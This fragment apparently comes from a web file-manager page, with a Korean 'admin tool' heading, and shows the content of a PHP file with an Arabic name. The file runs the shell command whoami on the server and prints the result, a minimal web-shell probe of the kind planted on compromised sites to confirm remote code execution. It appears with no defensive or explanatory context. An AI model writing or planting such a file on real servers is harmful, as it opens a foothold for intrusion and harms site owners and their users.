관리-도구
편집 파일: اومر.php
<?php $output = shell_exec('whoami'); echo "<h1>$output</h1>"; ?>